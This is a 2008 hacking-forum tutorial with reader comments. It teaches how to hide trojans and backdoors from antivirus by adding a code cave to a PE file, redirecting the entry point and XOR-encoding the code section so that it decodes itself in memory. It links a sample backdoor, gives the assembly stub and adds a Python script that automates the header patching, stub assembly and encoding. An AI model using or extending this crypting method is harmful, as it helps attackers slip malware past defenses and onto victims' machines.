

Evading Anti Virus Detection

Learn how to hide your trojans, backdoors, etc. from anti-virus.

Hiding backdoors and trojans from antivirus software
----------------------------------------------------
This is a proof of concept (POC) of how to evade detection by AV. In this article I will guide you through the generic steps of the process and show them by example on a specific, publicly available backdoor. The POC itself will not get past modern AV: a single-byte XOR over the code section is a well-known pattern, and a scanner that emulates the first few thousand instructions sees the decoded program anyway. The process for developing your own encoding/decoding scheme so that this still works is, however, entirely valid.

Programs used
-------------
http://www.white-scorpion.nl/programs/backdoor.zip -- basic backdoor
http://www.4shared.com/file/32660382/3562d77f/LordPE.html -- LordPE
http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm -- XVI32 hex editor
http://www.ollydbg.de/ -- OllyDbg

General Overview
----------------
We start by increasing the file size of our backdoor, which gives us room of our own to write code in (a code cave). We then hijack the entry point of the program and redirect it to our own encoder. For this POC the encoder XORs the code bytes with a one-byte key and then jumps back to the original starting place. XOR is its own inverse: the file is saved in the encoded state, so the bytes on disk no longer match the signatures in the AV database, and when the program runs the same XOR loop decodes it in memory, where a signature scanner does not look. Two things follow for the PE headers: the section that holds the cave must be executable, and the section being decoded (.text) must be writable, because the loop writes to it at run time.

Let's get started
-----------------
Note: Your addresses might not match mine exactly, so look at the general structure and you will be able to follow along.

Step - 1
--------
Open backdoor.exe (located in the bin folder) in LordPE. LordPE is a portable executable (PE) viewer and editor.
-Click on PE Editor to open the file.
-Click Sections in the new window. Here we see three sections: .text, .rdata and .data. For this example we select .data, because it is the last section and therefore owns the bytes we are about to append to the end of the file. Right-click it and select Edit Section Header.
-Add 0x1000 bytes (4096) to both the virtual size and the raw size. Mine read as follows afterwards:
    VirtualSize = 00001B4A
    RawSize = 00001200
-Click on the (...) next to the flags and set 'Executable as code'. This is where we will build our encoder/decoder, so it must be executable.
-Edit the section header for .text as well and set it to Writable (also under flags). The XOR loop modifies .text in memory; on a read-only code page the first write would crash the program.
-If the enlarged .data no longer fits under SizeOfImage in the optional header, raise SizeOfImage too (rounded up to the section alignment), or the loader will refuse the file for that reason as well.
-Save and close LordPE.

Step - 2
--------
If you try to run your backdoor now you will get an error saying it is not a valid Win32 application. This is because our sizes no longer balance: we told the loader there are 0x1000 more bytes of raw data in .data, but the file does not contain them yet. So we now pad the program.
-Open it in XVI32 (or another hex editor of your choice).
-Scroll to the end of the file; this is where we add our 0x1000 bytes.
-Edit > Insert (select Hex string: 00, Insert <n> times, and choose hexadecimal $1000).

This inserts the 0x1000 bytes we need to write our code in. Now save and close the hex editor. If you run backdoor.exe now you will notice it works, but it is still detected by the antivirus: we have not changed the code, and therefore not the signature, yet.

Step - 3
--------
OllyDbg: I am going to assume you have a basic understanding of what Olly is and how to use a few basic features.

--Preparing for our code injection--
Open the backdoor and first look at a few things:
-The address of the entry point.
-The address of our 0x1000 padding bytes (you can pick any address in this area).
Copy the first few lines of backdoor.exe to the clipboard and keep them in Notepad for later reference: the JMP we are about to write destroys the first instruction, and we have to replay it from the cave. Now scroll down to the padded 00 bytes and choose an address where we will inject our encoder. For this example I chose address 00401590.

--Altering the code--
The first thing we need to do is hijack the ModuleEntryPoint and redirect it to our section. Assemble this over the first instruction at the entry point:

    JMP 00401590    ; force the jump from the module entry point to our code cave

Select this line and save it to the file: right-click > Copy to executable > Selection, then save the file as backdoor_v2.exe. Note: if you change the file name from the original like I did, close the first file and open the altered one. You will notice the first two lines of code have changed:

    00401000 > $ E9 8B050000       JMP backdoor.00401590
    00401005 . 68 34 31 40 00      ASCII "h41@",0

The second line is the original PUSH 00403134 (68 34 31 40 00), which is still there; Olly only shows the bytes as a string because the 5-byte JMP consumed the CALL that used to precede them. If you step once now you will land on address 00401590. Now we can write our XOR loop:

    00401590  MOV EAX, 0040100A            ; first byte to encode
    00401595  XOR BYTE PTR DS:[EAX], 5E    ; XOR the byte at EAX with the key 5E
    00401598  INC EAX                      ; next byte
    00401599  CMP EAX, 004014EB            ; have we reached the last byte to encode?
    0040159E  JLE SHORT 00401595           ; if not, jump back to the XOR

After this we put back the code we overwrote (and skipped) at the beginning:

    CALL 00401468
    PUSH 00403134

Then we jump to the address after the PUSH in the original code, 0040100A:

    JMP 0040100A

At this point we have the XOR loop, the replayed original instructions and a return to the beginning. Type the CALL into Olly rather than pasting its original bytes: a CALL is encoded relative to its own address, so the bytes that were correct at 00401000 would call the wrong place from the cave. Olly computes the new displacement for you.

However, we are not quite done yet. Save your modifications and set a breakpoint (F2) on the instruction after the JLE SHORT. Now run the program: it stops at the breakpoint, and at that moment the code range in memory is encoded. Highlight the entire program and again save it (Copy to executable > Selection), this time as backdoor_v3.exe. The program on disk is now entirely encoded except for the first few lines and our code cave. When it is run, it again jumps to our XOR loop, decodes itself in memory, and then proceeds to function as it was written.

Keep in mind what this does and does not buy you. The static signature of the original code is gone, but the stub itself is a new signature, the key is visible in the stub, and an emulator that executes a few thousand instructions sees the decoded code. Varying the key, the instruction sequence and the layout per sample is where the work in a real encoder lies.

This article was written by stdio in reference to a demo performed by Mati Aharoni (Muts).
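The script below is an added example, not code from stdio's article or from the backdoor.zip package. It performs the three manual steps of the walkthrough with Python's standard library on a constructed PE32 that stands in for backdoor.exe; the sample binary, its section layout and the resulting cave address 0x402200 are assumptions, while the encoded range 0040100A-004014EB, the key 5E, the entry-point instructions CALL 00401468 / PUSH 00403134 and the stub's instruction sequence come from the article. It shows what LordPE and OllyDbg did behind the scenes: which header fields Step 1 touches (including SizeOfImage), why Step 2's padding has to belong to the last section, how the rel8 and rel32 displacements in the stub are computed from the cave address, and that running the loop over the saved file a second time yields the original code again.

```python
# Added example, not code from the article or backdoor.zip: the walkthrough's three
# manual steps done with the standard library on a constructed PE32 standing in for
# backdoor.exe. Layout, cave address and sizes are assumptions.
import struct

SEC = struct.Struct("<8sIIIIIIHHI")          # IMAGE_SECTION_HEADER, 40 bytes
SCN_CODE, SCN_EXEC, SCN_WRITE = 0x20, 0x20000000, 0x80000000
IMAGE_BASE, PAD, KEY = 0x400000, 0x1000, 0x5E
ENC_START, ENC_END = 0x40100A, 0x4014EB      # range the article's loop encodes
ORIG_ENTRY = b"\xE8\x63\x04\x00\x00\x68\x34\x31\x40\x00"  # CALL 401468 ; PUSH 403134 at 401000

def build_sample_pe():
    """Constructed stand-in: .text at RVA 0x1000 holding 0x4EC bytes of code (last
    byte 0x4014EB), .data at RVA 0x2000, 0xA00-byte file without overlay."""
    opt = struct.pack("<HBB9I6H4I2H6I", 0x10B, 0, 0, 0x600, 0x200, 0, 0x1000, 0x1000, 0x2000,
                      IMAGE_BASE, 0x1000, 0x200, 4, 0, 0, 0, 4, 0, 0, 0x3000, 0x200, 0, 2, 0,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + bytes(128)  # 16 empty dirs
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, len(opt), 0x102)
    text = SEC.pack(b".text", 0x4EC, 0x1000, 0x600, 0x200, 0, 0, 0, 0, SCN_CODE | SCN_EXEC | 0x40000000)
    data = SEC.pack(b".data", 0x100, 0x2000, 0x200, 0x800, 0, 0, 0, 0, 0xC0000040)
    hdr = b"MZ" + bytes(58) + struct.pack("<I", 0x40) + b"PE\0\0" + coff + opt + text + data
    code = ORIG_ENTRY + bytes((i * 7 + 3) & 0xFF for i in range(0x4EC - len(ORIG_ENTRY)))
    return hdr.ljust(0x200, b"\0") + code.ljust(0x600, b"\0") + bytes(0x200)

def u32(pe, off):
    return struct.unpack_from("<I", pe, off)[0]

def sections(pe):
    """Return (optional_header_offset, [(header_offset, fields), ...])."""
    e_lfanew = u32(pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsect = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    first = e_lfanew + 24 + struct.unpack_from("<H", pe, e_lfanew + 20)[0]  # SizeOfOptionalHeader
    return e_lfanew + 24, [(first + i * 40, SEC.unpack_from(pe, first + i * 40)) for i in range(nsect)]

def va_to_off(pe, va):
    """Translate a virtual address to a file offset through the section table."""
    rva = va - IMAGE_BASE
    for _, (_, _, sec_rva, rawsize, rawptr, *_) in sections(pe)[1]:
        if sec_rva <= rva < sec_rva + rawsize:
            return rawptr + rva - sec_rva
    raise ValueError(f"{va:#x} is not file-backed")

def step1_and_2(pe):
    """LordPE + hex editor: grow the last section by PAD and mark it executable, mark .text
    writable, raise SizeOfImage if needed, then append the PAD zero bytes the header claims."""
    pe = bytearray(pe)
    opt, secs = sections(pe)
    last_off, last = secs[-1]
    if last[4] + last[3] != len(pe):                      # PointerToRawData + SizeOfRawData
        raise ValueError("overlay or truncated file: cave offset would differ")
    cave_va = IMAGE_BASE + last[2] + last[3]              # first padded byte, as a VA
    for off, f in secs:
        f = list(f)
        if f[0].rstrip(b"\0") == b".text":
            f[9] |= SCN_WRITE                             # the XOR loop writes here at run time
        if off == last_off:
            f[1], f[3], f[9] = f[1] + PAD, f[3] + PAD, f[9] | SCN_CODE | SCN_EXEC
            align = u32(pe, opt + 0x20)                   # SectionAlignment
            need = (f[2] + f[1] + align - 1) & -align     # aligned end of the grown section
            struct.pack_into("<I", pe, opt + 0x38, max(need, u32(pe, opt + 0x38)))  # SizeOfImage
        SEC.pack_into(pe, off, *f)
    return bytes(pe) + bytes(PAD), cave_va

def assemble_stub(cave_va, call_target, push_imm, resume_va, start=ENC_START, end=ENC_END, key=KEY):
    """Hand-encoded x86 for the cave. Every rel8/rel32 is measured from the end of its own
    instruction, so the CALL cannot be copied byte for byte from 401000 (Olly re-encodes it)."""
    stub = struct.pack("<BI", 0xB8, start)                                  # MOV EAX, start
    loop = len(stub)
    stub += bytes([0x80, 0x30, key]) + b"\x40"                              # XOR BYTE PTR [EAX], key ; INC EAX
    stub += struct.pack("<BI", 0x3D, end)                                   # CMP EAX, end
    stub += struct.pack("<Bb", 0x7E, loop - (len(stub) + 2))                # JLE SHORT loop
    stub += struct.pack("<Bi", 0xE8, call_target - (cave_va + len(stub) + 5))  # CALL call_target
    stub += struct.pack("<BI", 0x68, push_imm)                              # PUSH push_imm
    stub += struct.pack("<Bi", 0xE9, resume_va - (cave_va + len(stub) + 5))    # JMP resume_va
    return stub

def step3(pe, cave_va, call_target=0x401468, push_imm=0x403134):
    """OllyDbg: write the stub into the cave and overwrite the first 5 bytes at the entry
    point with JMP cave. Defaults are the two instructions from the article's binary."""
    pe = bytearray(pe)
    entry_va = IMAGE_BASE + u32(pe, sections(pe)[0] + 16)                   # AddressOfEntryPoint
    stub = assemble_stub(cave_va, call_target, push_imm, resume_va=entry_va + 10)
    off = va_to_off(pe, cave_va)
    pe[off:off + len(stub)] = stub
    off = va_to_off(pe, entry_va)
    pe[off:off + 5] = struct.pack("<Bi", 0xE9, cave_va - (entry_va + 5))
    return bytes(pe)

def xor_range(pe, start=ENC_START, end=ENC_END, key=KEY):
    """The stub's loop on the file image; one pass encodes, a second pass decodes."""
    pe = bytearray(pe)
    for va in range(start, end + 1):
        pe[va_to_off(pe, va)] ^= key
    return bytes(pe)

if __name__ == "__main__":
    padded, cave = step1_and_2(build_sample_pe())
    armored = xor_range(step3(padded, cave))                                # what v3 holds on disk
    print(f"cave {cave:#x}, file {len(armored):#x} bytes, SizeOfImage {u32(armored, sections(armored)[0] + 0x38):#x}")
    print("stub:", assemble_stub(cave, 0x401468, 0x403134, ENC_START).hex(" "))
```

Running the file prints the cave address and the stub bytes; calling xor_range on the armored image once more is exactly what the stub does in memory at start-up, and comparing that result with the original shows the round trip. The overlay check in step1_and_2 matters because the padding is appended at the end of the file: if data already sits after the last section's raw end, the appended bytes are not where the header says they are.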

Posted by stdio on July 26 2008 - 12:26:10. 6 Comments. 8913 Reads.

Comments

Uber0n on July 27 2008 - 09:58:10
Really interesting and very well written. I'm impressed B)

korg on August 19 2008 - 08:15:29
Nice job. I have read most of Mati's articles I have found; he has some interesting topics.

Zephyr_Pure on August 29 2008 - 04:17:11
It's very rare that I say this... but that was a damn good article. Showed a great deal of technique and knowledge while keeping it simple.

stdio on August 29 2008 - 17:54:11
Thanks for all the kind replies. However, I did manage to stumble across a more detailed paper describing the same process, written after mine. Here's the link if interested: http://www.milw0rm.com/papers/217

sam207 on October 17 2008 - 07:07:53
Very nice one... Thanks a lot for this one.

hellboundhackersok on November 08 2008 - 21:28:57
The backdoor program makes McAfee SiteAdvisor turn red. Nice job. ahahah


HellBound Hackers, 2008-2009.
